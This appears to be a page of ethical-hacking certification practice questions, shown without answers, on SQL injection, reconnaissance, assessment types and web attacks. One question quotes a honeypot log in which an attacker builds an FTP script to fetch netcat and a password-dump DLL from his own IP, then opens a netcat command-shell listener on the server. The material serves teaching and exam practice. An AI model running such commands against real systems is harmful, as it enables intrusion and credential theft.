How would an attacker use this technique to compromise a database?
A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database?
What would be among the first steps that he would perform?
When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? (Choose the best answer)
What would you call such an attack?
Your boss Tess King is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack?
Choose the attack type from the choices given below.
Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit. Choose the attack type from the choices given below.
What can you infer from the exploit given?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.
The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom” “cmd1.exe /c
ftp -s:ftpcom” “cmd1.exe /c nc -l -p 6969 ecmd1.exe”
What can you infer from the exploit given?
Which of the following is the best way an attacker can passively learn about technologies used in an organizat
Which of the following is the best way an attacker can passively learn about technologies used in an organization?
Is there some way to 4go back and see the code for that error?
Say that “abigcompany.com” had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to 4go back and see the code for that error? Select the best answer.
What does black box testing mean?
What does black box testing mean?
What kind of assessment will you be performing?
You have just received an assignment for an assessment at a company site. Company’s management is concerned about external threat and wants to take appropriate steps to insure security is in place. Anyway the management is also worried about possible threats coming from inside the site, specifically from employees belonging to different Departments. What kind of assessment will you be performing?
What would you term this attack?
Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack?